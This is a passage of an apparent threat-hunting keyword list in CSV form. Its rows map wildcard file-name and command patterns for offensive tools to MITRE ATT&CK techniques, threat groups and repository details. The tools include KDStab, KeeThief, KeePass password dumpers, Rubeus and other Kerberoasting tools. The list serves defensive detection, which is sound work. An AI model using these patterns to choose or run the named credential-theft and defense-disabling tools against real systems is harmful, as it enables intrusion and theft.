APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /DRIVER*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /KILL*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /LIST*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /NAME*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /PID*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /SERVICE*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /STRIP*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab * /UNLOAD*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*kdstab.cna*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*KeeFarceReborn.*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*KeePass.sln*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*keepass_common_plug.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*keepass_discover.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*keepass2john *.kdbx*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*KeePassBackdoor.*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*KeePassConfig.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*KeePassConfig.ps1*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*-KeePassConfigTrigger*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*keepass-password-dumper*,offensive_tool_keyword,keepass-password-dumper,KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump,T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/vdohney/keepass-password-dumper,1,1,N/A,N/A,6,567,47,2023-08-17T19:26:55Z,2023-05-01T17:08:55Z -*KeePwn plugin add -u * -p * -d * -t *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*KeePwn plugin check -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*KeeTheft/Dinvoke*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,1,private github repo,10,,N/A,,, -*KeeThief*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*KeeThief.*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*KeeThief.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*KeeThiefSyscalls*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,1,private github repo,10,,N/A,,, -*keethief-syscalls*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*keodbianoliadkoelloecbhllnpiocoi*,greyware_tool_keyword,Hide My IP VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*kerberoast /*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*kerberoast /*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Kerberoast.*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,1,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*kerberoast.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*Kerberoast.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*kerberoast_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerberoast_blind_output_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerberoast_john_results_*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*kerberoastables.txt*,offensive_tool_keyword,targetedKerberoast,Kerberoast with ACL abuse capabilities,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/ShutdownRepo/targetedKerberoast,1,1,N/A,N/A,3,254,43,2023-07-16T22:06:29Z,2021-08-02T20:19:35Z -*kerberoasting*,offensive_tool_keyword,OSCP-Cheatsheets,kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.,T1558 - T1208 - T1003 - T1110,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md,1,1,N/A,N/A,1,81,33,2019-09-09T22:07:47Z,2019-09-12T22:07:31Z -*kerberoasting.boo*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*kerberos*.kirbi*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 